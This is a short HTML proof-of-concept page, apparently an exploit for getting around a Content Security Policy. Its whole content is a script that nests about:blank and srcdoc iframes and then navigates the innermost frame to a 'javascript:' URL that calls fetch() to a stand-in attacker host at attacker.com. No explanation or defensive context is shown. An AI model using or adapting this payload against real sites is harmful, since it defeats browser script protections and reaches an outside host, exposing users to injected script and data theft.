<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGfbnNyGGGGG" src="about:blank"></iframe>
<script nonce='123'>
window.onload = function() {
    GGGGGfbnNyGGGGG.addEventListener("load",()=>{GGGGGfbnNyGGGGG.srcdoc="<iframe id=GGGGfbnNyGGGG src=about:blank><\/iframe><script>GGGGfbnNyGGGG.addEventListener('load',()=>{GGGGfbnNyGGGG.contentWindow.location.href='javascript:fetch(`https://attacker.com/report/report`)';},{once:true});<\/script>";},{once:true});
};
</script>
</body>
</html>